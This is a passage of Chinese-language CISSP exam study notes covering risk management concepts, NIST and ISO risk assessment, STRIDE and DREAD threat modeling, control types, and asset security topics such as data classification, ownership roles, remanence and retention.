前面讲了脆弱性,那么一个弱点有多个大可能会被利用,并产生破坏呢? 威胁就是利用脆弱性的行为,它会带来危险:即某人或某个软件识别出特定的脆弱性,并 利用其来危害公司或个人。任何可能发生的、造成资产价值损失的事情都被称为威胁。威胁主 体通常是人,不过也可能是程序、硬件或系统。威胁事件包括火灾、地震、水灾、系统故障和 人为错误(一般是因为缺少培训或无知)和断电等等。 ⑤风险(Risk) 脆弱性、威胁都是客观可能存在的东西或者事件,而风险就是一个量化的指标(百分比或 者经济损失的价值),代表了是某种威胁事件利用了脆弱性,并导致资产损害的可能性。它是 1 个概率性的评估。可能性越大,风险就越大,损失就越大。 风险=(威胁+脆弱性)×100%=潜在影响 会考到风险相关的三要素:威胁、脆弱性和消减措施。 ⑥暴露(Exposure) 显示脆弱性,把组织暴露在威胁之下。暴露就是存在可利用的脆弱性。暴露并不是指威胁 事件实际发生了,而是存在漏洞被利用的潜在可能性,或者是资产被迫害的可能性。也就是说, 没暴露前,没人知道系统有脆弱性、威胁和风险,一切都是安全的;只有真实暴露了,才会发 生实际的安全事件,一切才变得不安全。 ⑦防护措施(Safeguards) 防护措施就是安防对策,是指能消除脆弱性或应对一种或多种特定威胁的任何方法,包括 技术的、物理的、管理的。当然,一切的目的是为了消减风险(mitigate risk),包括控制 (control)、对策(countmeasure)和防护措施(safeguard)。 ⑧攻击(Attack) 攻击是 1 个威胁主体利用脆弱性的行为,前面几个概念都是纸上谈兵,只有攻击发生了, 才产生实际的、真正的破坏性影响。搞攻击就是搞破坏,搞破坏就是 ⑨破坏(Breach) 破坏就是破解了或者绕过了安防系统,也就是实现了非法进入。搞成了破坏,就能搞攻击 了。当破坏与攻击结合时,就会发生渗透事件或入侵事件。 ⑩残留风险(Residual Risk) 在实施安全措施之后仍然存在的风险。 最后用一个图来描述关系: —37— 2.美国 NIST 的风险评估过程 NIST 开发了一套风险方法,出版在 SP 800-30 文档中。这套 NIST 方法叫做信息技术体系 风险管理指南(Risk Management Guide for Information Technology System),被认为是美 国联邦政府标准。 ①准备评估。 目标是搞清背景。 *确定评估的目的,*确定评估范围,*识别与评估有关的假定与约束,*识别评估的输入, *识别评估期间使用的风险模型和分析方法。 ②进行评估。 目标是生成信息安全风险列表,从而根据风险水平区分优先级,并通知风险响应决策。 *识别与组织相关的威胁源,识别这些源可能产生的威胁事件, *识别组织内可被威胁源利用的脆弱性, *确定威胁源会引发的特定威胁事件的可能性,以及威胁事件成功的可能性, —38— *确定威胁事件产生的负面影响 *确定威胁负面影响的信息安全风险。 ③沟通评估结果和分享风险的相关信息。 目的是确保决策者了解掌握风险相关的信息,指导风险决策沟通,共享信息。 *沟通风险评估结果,*在风险评估的执行阶段共享相关信息,支持其他的风险管理活动 ④维护评估。 目的是跟踪掌握风险变化情况。 *监控风险评估中识别的风险因素,掌握后续变化,*更新风险评估报告。 3.ISO/IEC 27005 一个国际标准,规定在 ISMS 框架内如何进行风险管理。 I.1 识别威胁与脆弱性 对 IT 的威胁并不只限制在 IT 源,也有自然灾害、人和管理的因素。脆弱性评估需要一个 技术团队,也需要非专业的人员来提高全面性。 通过常使用微软的 STRIDE 威胁分类方案(6 个首字母)。即: ①电子欺骗(Spoofing )——通过使用伪造身份获得对目标系统访问权限的攻击行为。可 使用 IP 地址、MAC 地址、用户名、系统名称、无线网络名称、电子邮件地址以及许多其它类 型的逻辑标识来欺骗。 ②篡改(Tampering )——任何对数据进行未授权的更改或操纵的行为,包括在传输中的和 被存储的数据。这种攻击主要侵害完整性和可用性。 ③否认(Repudiation )——用户或攻击者否认执行了一个动作或行为的能力。也就是抵 赖、不承认有过非法行为。 ④信息披露( Information disclosure )——将私人、机密或受控信息揭露、传播给外部 或未授权实体的行为。 ⑤拒绝服务(DOS)——指攻击试图阻止对资源的授权使用。这可以通过缺陷开发、连接重 载或流量泛滥实现。DOS 攻击并不一定会导致对一个资源的完全中断;而是会减少吞吐量或造 成延迟,以阻碍对资源的有效利用。 ⑥权限提升( Elevation of privilege )——此攻击是指有限的用户帐号被转换成一个拥 有更大特权、权力和访问权的帐户。 一骗二改三抵赖;窃密瘫痪提权限。 I.2 风险评估/分析 (定性分析、定量分析、混合分析) 要搞清 2 种风险分析的区别: ①项目风险分析 project risk analysis:团队针对项目实施的分析,为了避免项目失败。 ②安全风险分析 security risk analysis:仅针对某个信息系统的分析,为了找其漏洞。 1.风险评估的任务包括: ①识别构成风险的各种因素; ②评估风险发生的可能性和造成的影响,并最终评价风险水平或大小; —39— ③确定组织承受风险的能力; ④确定风险消减和控制的策略、目标和优先顺序; ⑤推荐风险消减对策以供实施。 2.风险评估的内容: ①资产面临的威胁。Threats to its assets ②当前环境中存在的脆弱性。Vulnerabilities present in the environment ③威胁真实发生的概率(定量评估的频次)。The likelihood that a threat will be realized by taking advantage of an exposure (probability and frequency when dealing with quantitative assessment) ④威胁发生带来的影响。The impact that the exposure being realized will have on the organization ⑤消减措施。Countermeasures available that can reduce the threat’s ability to exploit the exposure or that can lessen the impact to the organization when a threat is able to exploit a vulnerability ⑥剩余风险。The residual risk (e.g., the amount of risk that is left over when appropriate controls are properly applied to lessen or remove the vulnerability) 3.定量风险分析/必考 要计算出具体的概率百分比,用货币形式表示每个资产和威胁。虽然,纯粹的、精准的定 量分析是不可能的,但还是能用的。下面是定量风险分析的六个主要步骤或阶段,都不难理解: ①列出资产清单并分配资产价值,即 AV(asset value); ②研究生成每个资产所有可能威胁的列表。为每个威胁计算暴露因子 EF(exposure factor)和单一损失期望 SLE(single loss expectancy),就是单损。 EF 也称为潜在损失,是该风险实际发生时,可能损失的资产价值的百分比。 SLE 就是该风险实际发生 1 次时,可能损失的资产价值,也就是损失多少钱。 SLE=AV×EF ③计算每种风险的年发生概率 ARO(annualized rate of occurrence)。 ARO 就是该风险每年可能发生几次,值从 0 到无穷大,越大越危险。如果风险每年发生很 多次,它带来的损失可以远远超出相关资产的价值。 ④计算每个风险的年度损失期望 ALE(annualized loss expectancy),就得到每个威胁 可能的总损失。 ALE=SLE×ARO ⑤研究每个威胁的对策,然后基于对策,计算采取措施后的 ARO 和 ALE。 不管有没有采取措施,EF 是不变的,也就是不管攻击搞没搞成,反正只要搞成了,你就 会损失这么多。安防措施的目的应是减少 ARO,就不让风险实际发生。 ⑥针对每个资产的每个威胁的每个对策执行成本/效益分析。选择对最适用的对策。 这里要先计算每个威胁采取某种防护措施的年度成本 ACS(annual cost of safeguard), 部署安防系统的价值就是:施策前的 ALE—施策后的 ALE—ACS,可以让高层看到安防系统 实现了多大的效益。SLE 和 ALE 的区别要搞清楚,经常考。 —40— 当然,除了算清楚钱,也要考虑法律因素、社会效益等,要采取“应尽关注”的态度,有 些安防开支可以适度增加,不能只管赚钱。 4.定性的风险分析 不算钱,只是评估其风险、成本和影响,可以使用很多统筹学里用到的技术,如头脑风暴、 得尔非(Delphi)、问卷调查、各种开会等。 ①场景(Scenarios) 就是用一页纸讲清楚 1 个风险案例,用高、中、低或者 A、B、C 什么的表示影响程度。 ②Delphi 技术 学过统筹学就知道,Delphi 技术就是一个简单的匿名反馈和响应过程。参与者通常被集 中在一间会议室中,对每项意见或问题匿名反馈自己的想法;然后组织者修改完善这个报告或 方案,再进行匿名反馈;最后所有参与者都答成一致,没有意见了。 ③风险评估矩阵 横轴是风险影响,一般分 5 级;纵轴是风险发生的可能性,一般分 5 级。然后就得到了每 个风险的评级。 5.其它 风险评估的方法论(模型)有: ①FRAP(Facilitated Risk Analysis Process):专用的定量方法,先进行预筛选以节省 时间和金钱。 ②OCTAVE(Operationally Critical Tbreat, Asset and Vulnerability Evaluation): 面向团队的方法,通过组织研讨会来评估组织风险和 IT 风险。 ③AS/NZS 4360:澳大利亚和新西兰的一种业务风险管理评估方法。 ④FMEA(Failure Modes and Effect Analysis),失效模式和影响分析:利用组件的基本 功能来识别缺陷及其影响的一种方法。 ⑤故障树分析:分析具体缺陷在复杂系统中出现的根本原因的一种方法。 ⑥CRAMM 中央计算和电信机构风险分析管理方法:Central Computing and Telecommunications Agency Risk Analysis and Management Method。 I.3 风险分配/接受 (例如:系统授权) 1.风险分析的结果有: ①所有资产的完整和详细的评估。 ②所有威胁、风险、发生概率和一旦发生的损失的详细列表。 ③针对特定威胁的防护措施和对策列表,并且标识出其有效性与 ALE(年损)。 ④每种防护措施的成本/效益分析。 2.对风险的应对策略有四种: ①降低风险(Reduce or mitigate),就是风险消减,采取最佳性价比的安防措施。 ②转移风险(Assign or transfer),就是买保险或外包,自己不干有风险的事。 ③接受风险(Accept),组织机构书面说明对某风险不采取任何措施,比如容忍地震。 ④拒绝风险(Reject or ignore),最消极的态度,就当风险不存在,无视,不管它。 —41— 3.剩余风险 实施并实现了安防措施,仍然继续存在的风险被称为剩余风险,也是高层管理部门选择接 受的风险。这也表明通过成本/效益分析,发现某些防护措施并不划算。 首先算个总风险:就是在没有任务防护措施的情况下,组织将要面对的风险数量,与威胁、 脆弱性和资产价值有关。 然后算个控制间隙(controls gap):就是通过采取防护措施被减少的风险数量。总风险和 剩余风险之间的差值被称为控制间隙。代表了安防系统的效益,也就是可控制风险。 总风险-控制间隙(可控风险)=剩余风险。 I.4 风险应对策略选择 选择风险应对措施的原则主要有以下几个: ①措施的成本要小于资产价值。为办公室修个地下防空洞肯定是没必要的。 ②措施的成本要小于措施的效益。雇用 1 个中南海保镖做公司门卫也是没必要的。 ③措施的结果应当使攻击成本大于攻击获得的效益。压缩包加密就行了,要十年才能破解。 其它的原则就不列举了,自己看着办。 I.5 实施 就三类应对措施: 1.技术 包括:用户名、密码、智能卡和生物识别、加密、受限接口、访问控制列表、协议、防火 墙、路由器、入侵检测系统(IDS)以及阈值级别。 2.管理 主要关注人员与业务,包括:策略、过程、雇用准则、背景调查、数据分类和标签、安全 意识和培训效果、休假记录、报告和回顾、工作监督、人员控制以及测试。 3.物理 防止最直接访问和接触,包括:保安、围墙、移动探测器、闭锁的门、密封窗、灯光、线 缆保护、笔记本电脑锁、磁条卡、看门狗、摄像机、陷阱以及报警器。 I.6 控制措施的类型 (预防措施、 检测措施、 纠正措施等) 1.访问控制的 7 个主要类型/安全控制功能种类: ①管理(Directive)/指引:指令性、强制性的规定,如:安全策略需求或标准、张贴通 告、疏散路线出口标志、监控、监督、工作任务过程。 ②威慑(Deterrent):旨在打击潜在的攻击者。吓唬人别搞坏事,如:策略、安全意识 培训、锁、围墙、安全标识、保安、陷阱、安全摄像机。 ③预防(Preventive):旨在避免发生事件。阻止非法进入,如:围墙、锁、生物测定学、 陷阱、灯光、警报系统、责任分离、工作轮换、数据分类、渗透测试、访问控制方法、加密、 审计、使用安全摄像机或闭路电视(CCTV) 、智能卡、回叫、安全策略、安全意识培训、反病 毒软件、防火墙和入侵防御系统。 —42— ④补偿(Compensating):提供可替代控制措施。增加访问控制措施,如:对 PII(个人 信息)加密。 ⑤检测(Detective)/监测:确认事件的活动和潜在的入侵者。发现非法进入,如:保安、 移动探测器、记录和检查安全摄像机或闭路电视捕获的事件(CCTV) 、工作轮换、强制休假、 审计跟踪、蜜罐或蜜网、IDS、违规报告、对用户的监管和检查、事故调查。 ⑥纠正(Corrective)/矫正:事件发生后,修复部件或系统。发生非法访问后,将系统 还原至正常的状态,如:终止恶意行为或重启系统、删除或隔离病毒。 ⑦恢复(Recovery):目的是使环境恢复正常运作。比纠正性控制更高级、更复杂,如: 备份和还原、容错驱动系统、系统镜像、服务器群集、反病毒软件以及虚拟机影像。 很多安全措施是同时符合以上多种类型的,如果问 CCTV 是预防、还是威慑、还是检测? 就要看题目中的场景了,它发挥的实际作用是什么就选最佳答案。 I.7 控制措施评估 看看第六域就行了。 I.8 风险监控与测量 安全控制措施必须是可以监测和度量的,否则并提供任何安全性。也就是安防系统的功能 有效性和好处要能被看到。 I.9 资产评估 没什么要考的内容。 I.10 汇报 一个风险报告应该是准确、及时、全面的,能为整个组织提供清晰和准确的决策支持,并 且定期的更新。例如,美国政府机构被要求在发现个人信息泄露的 1 小时内,向美国计算机应 急小组(US-CERT)汇报。 I.11 持续改进 持续改进广泛使用的工具是四步质量模型,PDCA(计划——执行—评估—行动),也称为 戴明环或休哈特环,这个在各种领域用的太多了: ①计划:识别时机并计划改变 ②执行:小范围内实施改变 ③检查:用数据分析改变的结果,确定是否有差别 ④行动:如果改变是成功的,在更大范围内实施它和持续评估结果;如果这个改变无效, 再次开始循环。 其他广泛使用的持续改进方法有:六西格玛,Lean 等。 I.12 风险框架 风险框架是关于如何评估风险、解决风险和监管风险的指导或方法。CISSP 考试主要考美 国国家标准技术研究所(NIST) 在 800-37 专业出版中的定义。其它的企业风险管理(ERM)框 架有: 1. COSO:2013 —43— 2. ISO 27005:2008 3. AS/NZS and 31000:2009 4. ISO Guide 73:2009 5. NIST Special Publications 800-37 and 800-39 6. ISACA (2009) Risk IT Framework 详细看第 9 域。 J.理解与运用威胁建模 威胁建模是指潜在威胁被识别、分类和分析的安全流程。它通过寻找系统潜在的威胁以建 立对抗的策略和安全的系统,使您可以对最可能影响系统的威胁进行识别和评价。 ①威胁建模的主动式方法发生于系统开发的早期阶段,也被称为防御方法。事先集成安全 解决方案更符合成本效益,比后面硬塞的方案更成功。但是,并不是所有的威胁都可以在设计 阶段预测出来,所以仍然需要被动式威胁建模来解决不可预见的问题。 ②威胁建模的被动式方法发生在产品被创建和部署之后,也被称为对抗的方法。通常需要 在部署后精心制作产品的更新或补丁,有可能会牺牲一些功能性和用户友好性。 J.1 识别威胁 (例如:竞争对手、承包商、员工和可信合作伙伴) 1.识别威胁的结构化方法主要有: ①关注资产 对资产进行估值,并试图识别对于宝贵资产的威胁。 ②关注攻击 假设有潜在的攻击者,并基于攻击者的目标识别他们所代表的威胁。 ③关注软件 主要考虑企业内部各种软件系统的潜在威胁。 2.对威胁进行分类 通过常使用微软的 STRIDE 威胁分类方案(6 个首字母)。即: ①电子欺骗( Spoofing )——通过使用伪造身份获得对目标系统访问权限的攻击行为。可 使用 IP 地址、MAC 地址、用户名、系统名称、无线网络名称、电子邮件地址以及许多其它类 型的逻辑标识来欺骗。 ②篡改( Tampering )——任何对数据进行未授权的更改或操纵的行为,包括在传输中的 和被存储的数据。这种攻击主要侵害完整性和可用性。 ③否认( Repudiation )——用户或攻击者否认执行了一个动作或行为的能力。也就是抵 赖、不承认有过非法行为。 ④信息披露( Information disclosure )——将私人、机密或受控信息揭露、传播给外部 或未授权实体的行为。 ⑤拒绝服务(DOS) ——指攻击试图阻止对资源的授权使用。这可以通过缺陷开发、连接重 载或流量泛滥实现。DOS 攻击并不一定会导致对一个资源的完全中断;而是会减少吞吐量或造 成延迟,以阻碍对资源的有效利用。 —44— ⑥权限提升(Elevation of privilege ) ——此攻击是指有限的用户帐号被转换成一个拥 有更大特权、权力和访问权的帐户。 一骗二改三抵赖;窃密瘫痪提权限。 3.威胁的优化级排序 对威胁进行排序或定级,可以利用 3 种技术来完成: ①概率×潜在 使用一个代表风险严重程序的编号,编号值从 1 到 100,100 是最严重的;概率和损失的 值从 1 到 10 。 ②高/中/低 很简单,每个威胁都被标注为三种优先级标签中的一种。高优先级的需要立即解决。 ③DREAD 评级系统 对每种威胁问五个问题,根据回答情况来评级: 1. 潜在破坏——如果威胁成真,可能造成的损失有多严重? 2. 再现性——攻击者重复利用这一漏洞有多复杂? 3. 可利用性——实施攻击有多难? 4. 受影响用户——多少用户可能受到攻击影响?(百分比) 5. 可发现性——攻击者发现该弱点有多难? 每个问题通过 H/M/L 或 3/2/1 的值来回答,从而建立一个详细的威胁优先级表。 J.2 确定和图解潜在攻击 (例如:社会工程学攻击、电子欺骗攻击) 进行威胁建模,确定可能发生的潜在攻击,通常通过创建图表来完成,包括元素、数据流 指向和特权边界等要素。 J.3 执行风险降低分析 执行风险降低分析,字面上写的是降低,其实是指对程序、系统或环境的细化、分解和分 析,就是对风险的详细分析。目的是为了更好地理解产品内部逻辑和与外部的交互关系,并理 解输入、处理、安全性、数据管理、存储和输出等详细过程。系统分解的越合理、越细致,就 越容易识别威胁。在这个分解流程中,你必须了解五个关键概念: 信任边界——信任或安全等级发生改变的位置 数据流路径——数据在两个位置之间的流动 输入点——接收外部输入的位置 特权操作——比普通用户或流程有更大特权的任何活动,如修改系统参数等 安全立场和方法细节——安全策略、安全基础和安全假设的声明 J.4 风险补救技术和流程(例如:软件架构和运营) 没什么要考的内容。 K 整合安全风险考量至采购策略与实践中 采购流程 采购解决方案通常包括:征求建议书(Request for Proposal, RFP),RFP 用来针对业务 —45— 问题或需求让供应商提供解决方案的,它为采购决策提供了框架,并能让解决方案的风险和收 益在前期明确定义。RFP 要传达必要的安全需求,并要求得到有意义的和具体的答复,其中包 括供应商将如何满足这些要求。 K.1 硬件、软件和服务 没什么要考的内容。 K.2 第三方评估和监控 (例如: 现场评估、文档交换与审查、过程/策略评审) 很容易。 K.3 最低安全要求 没什么要考的内容。 K.4 服务级别要求 1.服务水平要求(SLR) 服务水平要求的文档包含客户对服务的要求,并演变成安全水平协定草案。它定义了: ①详细的服务水平目标 ②共有的责任 ③其他的需求尤指一组客户 2.服务水平协定(SLA) SLA 是一个 IT 服务提供者和客户之间的协定,可以包括多个服务或多个客户。它: ①描述 IT 服务 ②描述服务水平目标 ③明确说明 IT 服务提供者和客户的责任 3.服务水平报告 服务水平报告是对提供商交付约定的服务质量的能力进行调查并报告。 4.服务水平协议(SLA) VS 保证 SLA 定义供应商和客户间约定的性能级别和赔偿或处罚。然而,有 SLA 并不意味着供应商 总能遵守 SLA。 保证只能通过检查、评审、和评估来获得。 L.建立并管理信息安全教育、安全培训与安全意识 L.1 组织内所需的适当安全意识、培训与教育级别 1.意识 Awareness 安全培训的先决条件是意识。培养安全意识的目标是让员工高度重视安全的重要性,站在 讲政治的角度把安全放在第一位,充分认识到他们的安全责任和义务,知道能做什么、不能做 什么。许多工具都可以被用于培养安全意识,例如海报、通知、时事通讯文章、屏幕保护程序、 T 恤衫、经理振奋人心的讲话、告示、演讲、鼠标垫、办公用品、备忘录以及传统的由教师引 导的培训课程。 2.培训 Training 教训是教导员工履行工作职责、遵守安全策略并具备基本操作能力。要让新用户知道如何 使用 IT 基础架构、数据存储的位置以及如何和为什么要对资源分类。意识和培训往往都是内 —46— 部提供的。 3.教育 Education 往往是由外部提供的,是一项更全面、更细致的工作,对学生或用户进行系统的教学,通 常与用户参加认证考试、成为专家或寻求职务晋升关联。 搞清三者的区别,考题会要求选择某活动是属于其中那类? L.2 定期评审内容相关性 意识、培训和教育必须进行周期性的、适时的评估,以保持与时俱进。 —47— 第二域 资产安全 (保护资产的安全) Chapters 5 in OSG 7 th No Chapters in AIO 6 th 该域的内容不多。但是很多 CBK 里有的、会考到的内容在你的教材和培训班里都没有讲! A.信息与支持资产的分类(例如:敏感性、关键性) 资产必须根据安全策略先进行分类并标记,资产一般包括:敏感数据、硬件和存储介质。 1.敏感数据包括: ①个人身份信息 个人身份信息(PII)是任何可以识别或跟踪一个人的信息,包括姓名、社会保障号、出 生日期、出生地、电话号码、电子邮件地址、邮寄地址、社会保障号、名字、信用卡账号、银 行账号等;没有代表性的个人信息不是 PII,如:一个 MAC 地址、IP 地址、操作系统类型、最 喜欢的度假地点、高中吉祥物的名字等等。 ②个人健康信息 受保护的健康信息(PHI)是任何与某人健康有关的信息。 ③专有数据 专有数据指的是任何帮助一个组织保持竞争优势的数据,如版权、专利和商业秘密等。 2.数据分级 就是定义数据的保密等级,绝密、秘密、机密什么的,第一域 A 章节里讲过了。每个等级 的数据都必须采取相应的保护措施。CISSP 考试中的所谓的“敏感信息”是指任何不能公开的 信息。在第七域 E.5 章节也讲了分级与分类。 由于数据所有者最了解对数据的使用、以及数据对组织的价值,因而数据所有者应当决定 数据的级别。保护数据机密性最好的方法是使用强大的加密协议。此外,强大的身份验证和授 权控制能有效阻止未经授权的访问。 数据如何分级?要考虑以下 6 个方面的内容: ①谁将访问该数据。Who has access to the data? ②数据如何被安全处理。How the data is secured. ③数据将保存多久。How long the data is to be retained. ④采用何种方法废弃数据。What method(s) should be used to dispose of the data? ⑤数据是否应当被加密。Whether the data needs to be encrypted. ⑥数据的用途有哪些即如何使用。What use of the data is appropriate? 3.谁来决定信息分级? 信息所有者决定信息级别;管理员来实施,确保分级以及相关控制;所有者定期检查确保 信息正确的分级。 4.设备的生命周期 ①需求定义。Defining Requirements ②获取和实施。Acquiring and Implementing ③运作与维护。Operations and Maintenance —48— ④废弃和销毁(退役)。Disposal and Decommission B.确定并维护所有权(例如:数据所有者、系统所有者、业务/任务所有者) 一、数据政策 数据政策是:一整套指导建立数据管理框架的高层次原则,能被用于解决诸如数据访问、 相关法律、数据所有权和管理职责、数据获取等宏观战略问题。由于提供了高层次框架,所以 数据政策应当是动态和灵活的,既聚焦战略性指导,又能够适应各类不同类型的项目以及潜在 的新挑战。建立数据政策 establishing a data policy 要考虑的因素有: ①成本 Cost。②所有权和管理权 Ownership and Custodianship。 ③隐私 Privacy。④责任 Liability。(以终端的许可协议形式实现) ⑥敏感性 Sensitivity。(要保护好涉密数据) ⑦现存法律政策的要求 Existing Law and Policy Requirements。 ⑧策略和流程 Policy and Process。(合规的实施、政策修订和问题处置) 二、相关的角色 1.数据所有者(data owner) 数据所有者是数据最终责任人,通常是首席执行官、总裁或部门主管。他负责定义数据类 别、确定访问控制权限、确保给数据贴上合适标签。他们也要确保基于分类和组织的安全策略 要求足够安全。数据所有者的 4 个责任目标是: ①确定信息对组织使命的影响。②了解信息的替代成本。 ②决定在组织内外部哪些人需要该信息,以及在何种环境里信息应当被发布。 ④知晓何时信息是不准确的,不再需要的,或应当被销毁。 这里强调一下 NIST-SP800-18 里的术语: 行为规则(rules of behavior)、接受使用策略(AUP-an acceptable usage policy) 它们的概念是一样的,安装软件和网上注册账号时都经常碰到,是指用户阅读了并同意系 统的一系列要求(许可协议)。 2.系统所有者(system owner) 系统所有者是拥有涉密系统的人。他的责任是:拟制、实施和维持系统安全计划。 系统所有者通常和数据所有者是同一个人。 3.业务/任务所有者(Business/Mission Owners) 业务/任务所有者是指项目经理或信息系统所有者,它的责任和系统所有者有重叠。 业务所有者拥有的程序可能是由其他部门开发或管理的系统。技术人员过度严格的安全控 制可能会影响业务人员的使用。 4.数据处理者(Data Processors) 数据处理者是指处理数据的各类系统。不过,欧盟将数据处理者定义为人或实体。反正只 要是查看或使用数据了,它就是数据处理者。 这里强调下经常考的 7 个安全港原则(避风港 Safe Harbor program)。这是美国贸易部 的一个控制机制,防止未授权的信息泄露,相关的术语有: ①通知 Notice:任何组织必须告知个人使用数据的目的。(告知我) —49— ②选择 Choice:任何组织必须为个人提供可选择的机会。(我选择) ③向前传输 Onward transfer: 组织只有在遵守通知及选择规则的基础上才能向其他组 织传输资料。(别乱传) ④安全 Security:组织必须保护好数据。(别泄密) ⑤数据完整 Data integrity:组织不得将信息用作其它目的,还要确保数据真实可信。 (别乱改) ⑥访问 Access:个人可以查、改或删除任务组织所持有的他们的个人信息。(属于我) ⑦执行 Enforcement:组织必须落实以上各条原则。(别搞事) 数据出口方和进口方之间的合同必须事先获得国家数据保护当局的批准,方可传输出。 第一域 D.5 章节也讲到美国的安全港原则了。 有的考题会问道:The European Union (EU) Data Protection Directive’s seven principles。指的就是这 7 个东西。 5.数据管理员(Administrators) 负责分配数据权限,通常使用基于角色的访问控制模型来分配权限。 数据管理员的责任目标: ①明确地定义与功能相关的角色。②在项目的所有阶段建立数据的所有权。 ③注重数据可审计性。④在可持续的基础上确保良好的数据质量和对元数据的度量。 6.数据保管者(Custodians)/监管员 数据所有者将日常任务委任给保管者,保管者通过合理的数据保存和保护,协助保护数据 的安全和完整。技术人员或安管通常会成为保管人,很可能与上面说的管理员是同一人。 数据监管员的责任目标: ①遵守正确的、相关的数据政策和数据所有权指南。 ②确保合法用户对数据的访问,维护数据集的安全。 ③数据集的基础维护工作,包括但不限于数据存储和归档。 ④更新维护数据集文挡。⑤保障数据集的质量,验证相关更新,并定期审计其完整性。 7.用户(Users) 用户就是使用系统、获取数据并完成工作任务的人。和上面的业务/任务所有者有点区别。 三、质量控制/质量保障 QC/QA 质量控制/质量保障机制是为了防止数据被污染。 1.两类错误 数据污染可能发生在一个处理过程中或事件中,将以下两类基本错误导入数据集: ①记录错误 Errors of commission(授予错误)。数据在录入或转存时发生错误,可能由 设备故障造成。这类错误很普通,也容易被识别,能够在数据获取过程中通过适当的质量保障 机制 QA 来有效的减少错误,也可以通过数据获取之后应用数据控制流程 QC 来减少该类错误。 ②遗漏错误 Errors of omission。常常包括对合法数据的不充分记录,这样会影响到对 这些数值的解读。这样的错误可能很难被探测和娇正,但是通过严格的质量控制流程可以发现 很多这样的错误。 数据的寿命与数据文挡化的水平成正比,确保良好的数据质量的关键在于文档化:没有好 —50— 的文档化,用户很难确定数据是否适合使用,监管者很难知道由谁执行了怎样的数据质量检查。 文档化有 2 种类型: 一是记录数据的所有变更。 二是通过元数据反映数据集水平。 2.数据文档化的目标/好处 ①保证数据的使用寿命,满足不同目的复用。 ②确保数据用户理解数据内容、数据背景和数据集的限制。 ③便于发现数据集。 ④提高数据集和数据交换的互操作性。 数据需要按己经定义的规则和协议被精细管理,数据标准显得尤其重要。数据标准的好处 包括:*更有效率的数据管理(包括更新和安全);*促进数据共享;*提高数据质量;*提高数据 一致性;*促进数据集成融合;*更好地理解数据;*改善信息资源的文档化。 C.保护隐私 关于隐私详见第一域 H.6 章节,和第二域 A 章节。 C.1 数据所有者 详见 B 章节 C.2 数据处理者 详见 B 章节 C.3 数据残留 数据残留就是在数据被以某种方式擦除以后,仍然遗留的数据物理痕迹。掌握以下几个与 销毁相关的术语: 擦除(Erasing)/删除 就是删除数据,很容易被恢复的。 清除/消除(Clearing)/重写 消除或重写,要多次反复重写数据,一般的工具是恢复不了数据的。但硬盘的“坏区”、 SSD 等仍可能被恢复。(在同等密级的系统重用磁盘,只要做 Clearing 就行了) 根除(Purging)/彻底消除 比消除更强烈的一种形式。为了让存储设备能再次使用于非密环境,必须消磁、反复格式 化填充等,很麻烦。(要在低等级的系统重用磁盘,必须做 Purging 才行。) 解除分类(Declassification)/给介质脱密 解除分类就是脱密,就是上面讲的这个清除(purging),是一样的,搞不清楚什么区别。 脱密的成本比买个新盘还高,所以一般军方都是直接摧毁存储介质,不再做它用的。 净化(Sanitization)/给系统脱密 净化是指从系统或介质中拿走数据,确保不会以任何形式被恢复。有 2 种方式,一是上面 讲的解除分类,不破坏介质;二是把系统的硬盘拿走或销毁,要破坏介质。 消磁(Degaussing) 针对硬盘进行消磁,同时也会破坏电路元件,但仍不能确保数据彻底没了。技术人员还可 —51— 以把盘片拆到另一个硬盘上来读数据。消磁对光盘什么的肯定是没用了。 破坏/销毁(Destruction) 销毁是介质生命周期的最后阶段,也是清除介质数据最安全的方法。包括 Overwriting 覆 写、Degaussing 消磁、Encryption 加密、Media Destruction 介质销毁等。 考试中,处理数据残留问题的特殊方法有 3 种,当然最安全彻底的方法是销毁。如果云平 台上的数据没用了,只能通过加密来保护,你根本不知道它存在哪。 C.4 数据收集限制 没内容。 D.确保适当的数据保留(例如: 介质、 硬件、人员) 1.保留资产 包括记录保留、介质保留(也称硬件保留)、人员保留等形式。 记录保留指的是,保留和维护重要的日志信息,以供审计调查。 介质保留指的是,保管好涉密存储设备,直到它被合理净化。 人员保留指的是,员工必须签好保密协议(NDA),确保离职后不泄漏秘密。 不过保留时间太长了,成本很高,也会带来一些不必要的麻烦,法律上会没事找事。 E.确定数据安全控制措施(例如: 静态数据、 传输中数据) E.1 基准 基准/基线(base line)就是最低的安全标准,目标是建立最低安全控制措施。多层防御 体系的第一道防线就是采用基础性的网络安全技术和方法,它们为构建的更先进、可靠的技术 和方法提供了坚实的基础。基线目录列举并写明了各项安全控制措施的细节。 E.2 范围界定和裁剪 ①范围界定 Scoping(选优):企业根据实际条件、适用性等,选择运用最佳的安全标准。 ②裁剪 Tailoring(改进):企业根据需求和环境特点,对相关标准的具体措施进行优化。 上面两个动词一般用在宏观的管理层工作上,在考题中经常出现的另两个词是关于日志过 滤、数据清洗等情景的,经常会遇到: ①过滤/设置阈值 Threshold ②裁剪/限定阈值 Clipping 后面这两个词的联系与异同在具体的练习题里去理解意会吧,我是做过习题才知道正解答 案是什么,至于为什么也说不清楚。 E.3 标准选用 要熟悉很多标准以及负责这些标准的组织和实体。乱七八糟的,看第九域吧。CBK4 中文 版第 158 页介绍了很多的标准,考试里的偏题、难题可能从中随便抽一个来考,懒得看了。 E.4 密码学(加密) 密码学在第三域 I 章节讲了很多,别的域也讲了,重点看第三域 I 章节。要搞清楚静态数 —52— 据加密和和数据传输加密算法之间(流加密)的差异。 加密数据的各种工具可分为 3 个大类: ①自我加密的 U 盘设备。 ②介质加密软件。 ③文件加密软件。 传输过程的加密可分为 2 大类(这个点在通信、加密、IPsec 里都会提到): ①链路加密。加密所有数据。 ②端到端加密。路由信息是明文的,仅数据是加密的。 F.建立处理要求(例如:敏感信息的标示、标记、存储和销毁) 1.敏感数据的管理流程 ①标记(Marking) 可以用不同颜色的物理标签,更多的是用标题、注释、水印等数字标签。DLP 系统可以识 别和利用数字标签来管理文档。 ②处理 只有指定的人员才有敏感介质的访问权。应当对负责管理敏感介质的人员进行有关如何正 确处理和标记敏感介质的政策和流程方面的培训。 ③管理(Handling) 重点要管好数据的备份和导出。 ④存储(Storing) 数据要加密,存储介质要安全。 ⑤销毁(Destroying) 磁盘要消磁,固态盘要粉碎。 ⑥记录保存/保留 信息和数据只应当在需要时被保存。组织可以根据行业标准或法规要求在一定期限保存/ 保留特定记录。 2.其它 考试中还有这样的问题: While incident management is concerned primarily with managing an adverse event,problem management is concerned with tracking that event back to a root cause and addressing the underlying problem. 问题管理比事件管理更深入,前者要分析问题根源和潜在隐患;事件管理仅处理安全事件。 